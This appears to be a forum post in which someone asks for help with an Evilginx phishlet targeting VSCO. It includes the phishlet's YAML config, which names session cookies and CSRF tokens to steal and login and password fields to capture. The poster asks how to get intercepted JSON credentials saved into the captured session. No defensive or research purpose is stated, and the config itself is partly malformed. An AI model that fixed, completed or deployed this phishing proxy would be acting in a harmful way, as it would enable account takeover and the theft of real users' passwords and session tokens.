I created a phishlet.
The problem is that I don’t know how to properly intercept JSON credentials and parse them into the session.
I opened debug and saw that Evilginx detects the login and password, but doesn’t add them to the session.
I’ve tried many different options but couldn’t make it work.
Please help with this! I need the login and password to be added to the session!!!
name: ‘vsco’
min_ver: ‘3.0.0’
auth_urls:
- ‘/feed’
auth_tokens:
- domain: ‘.xx.co’
keys: [‘aws-waf-token’, ‘vs’, ‘vs_anonymous_id’] - domain: ‘xx co’
keys: [‘__Host-vs_csrf_token’, ‘vs_app_id’]
credentials:
username:
key: identity
search: ‘(.)’
type: ‘post’
password:
key: password
search: '(.)’
type: post
login:
domain: ‘xx.co’
path: ‘/user/login’